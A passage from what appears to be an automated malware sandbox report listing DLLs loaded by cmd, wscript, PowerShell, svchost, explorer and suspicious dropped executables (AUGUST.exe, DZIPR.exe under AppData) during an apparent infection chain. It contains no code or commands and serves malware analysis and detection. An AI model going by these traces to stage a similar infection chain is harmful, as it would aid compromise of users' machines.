                      Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: dzipr.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dzipr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dzipr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dzipr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
